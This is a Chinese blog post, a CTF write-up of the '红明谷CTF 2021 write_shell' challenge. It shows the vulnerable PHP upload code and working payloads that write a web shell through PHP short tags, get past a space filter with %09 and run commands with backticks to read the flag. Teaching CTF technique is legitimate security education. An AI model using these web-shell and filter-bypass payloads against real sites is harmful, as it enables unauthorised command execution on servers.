[红明谷CTF 2021]write_shell %09绕过过滤空格 ``执行

已于 2023-09-30 08:22:43 修改
阅读量376 收藏
点赞数
分类专栏: BUUctf 文章标签: php
于 2023-09-30 08:22:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/133426207
版权

目录

1.正常短标签

2.短标签配合内联执行

看看代码

 <?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
过滤了 木马类型的东西
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
如果是数组 就先变为 变量类型 然后再waf
      }
  }else{
      $input = check($input);
  }
}
这里就是对input 进行waf


$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
存入 sandbox/md5(当前ip地址)/目录中

if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
这里可以看我们当前存入的是哪个目录

    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

还是很简单的

存在两个方式

1.正常短标签

我们经过测试 能发现有一个短标签

<?system()?> 没被过滤 可以用于写入php代码

我们可以写入 ls看看 单引号被过滤我们使用双引号

?action=upload&data=<?system("ls")?>

然后去访问目录下的index.php

执行成功

我们就可以开始想 我们如果要看根目录 我们需要 ls / 只有空格被过滤了 我们如何绕过

网上一搜一大把

最简单的就是tab urlencode 即 %09

?action=upload&data=<?system("ls%09/")?>

执行 我们同样payload cat一下

2.短标签配合内联执行

?action=upload&data=<?echo%09`ls`?>

直接执行

同样的道理访问即可

?action=upload&data=<?echo%09`ls%09/`?>

?action=upload&data=<?echo%09`cat%09/flllllll1112222222lag`?>

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF解题笔记(2)
CODING...
01-09 5785
CTF检测过滤绕过笔记
CTFHub | 过滤空格
尼泊罗河伯的博客
06-20 1036
检查网页源代码发现这题如果有空格就不会执行,说明这题对空格做了过滤处理。同样在输入框输入 IP 进行测试,可以正常回显。
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1319
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
ctf 编码转换器 一键转换
09-21
Wintools各类编码转换器,既能转编又能加密(DES base64 MD5等等)
[红明谷CTF 2021]write_shell
cjdgg的博客
06-25 1533
[红明谷CTF 2021]write_shell 题目直接给出了源代码,看了一下源代码,利用点应该就是利用file_get_contents函数写shell获取我们需要的信息 在此之前我们还需要找到要写入shell的文件路径,这时我们可以发现可以通过?action=pwd进行查看 ...
[红明谷CTF 2021]write_shell 1
m0_62879498的博客
05-28 937
进入环境,首先进行代码审计 代码审计 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ .
[红明谷CTF 2021]write_shell1
wwwyyyxxxx的博客
03-04 377
换行绕过也不行,check函数虽然看着过滤的不多,但是一些关键的被过滤了,让写入空的php文件但是又把分号过滤了,这里在本地试了一下,发现短标签不需要分号,但是这样在本地会莫名其妙的输出1,有没有大佬解释一下。但是想传system("ls /")的时候又有个问题是空格过滤了,这里要用到一个函数是hen2bin()将十六进制转换为二进制编码后的字符串,ls / 十六进制编码是6C73202F。这里check函数是嵌套在waf里面的,waf嵌套做了一个数组的判断,而check才是真正的waf。
[红明谷CTF 2021]write_shell php短标签绕过
scrawman的博客
11-28 3446
[红明谷CTF 2021]write_shell 考的是php里的绕过,因为正则过滤php ; ~ eval等字符,所以php标签<?php?>写入不了 https://xz.aliyun.com/t/8107#toc-11这个文章讲绕过讲的挺详细的 对于这道题目可以用<?= ?>代替php标签。<?= ?>短标签会直接把php的结果输出,<? ?>的功能则和<?php?>完全一样。过滤空格可以用\t绕过,或者%09也是tab的URL编码。php
[红明谷CTF 2021]write_shell --不会编程的崽
不会编程的崽的博客
02-20 570
命令执行
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 285
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
1. NAS和SAN存储
u010198709的博客
06-13 491
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 324
异常处理的基本原理是,当try块的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程的错误和异常情况,提高代码的稳定性和可靠性。在实际开发,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 900
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其Apache和MySQL的安装并没有严格的顺序;
软考初级网络管理员__网络单选题
2301_80961833的博客
06-12 953
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述错误的是()。
无回显XXE攻击:隐秘的数据泄露技术
weixin_43822401的博客
06-14 487
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
初识形式化验证工具——CPN tools
qq_47966193的博客
06-13 989
CPN Tools工具学习
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程
爱酷码的博客
06-10 263
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程。测试环境:Nginx+PHP7.0+MySQL5.6。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值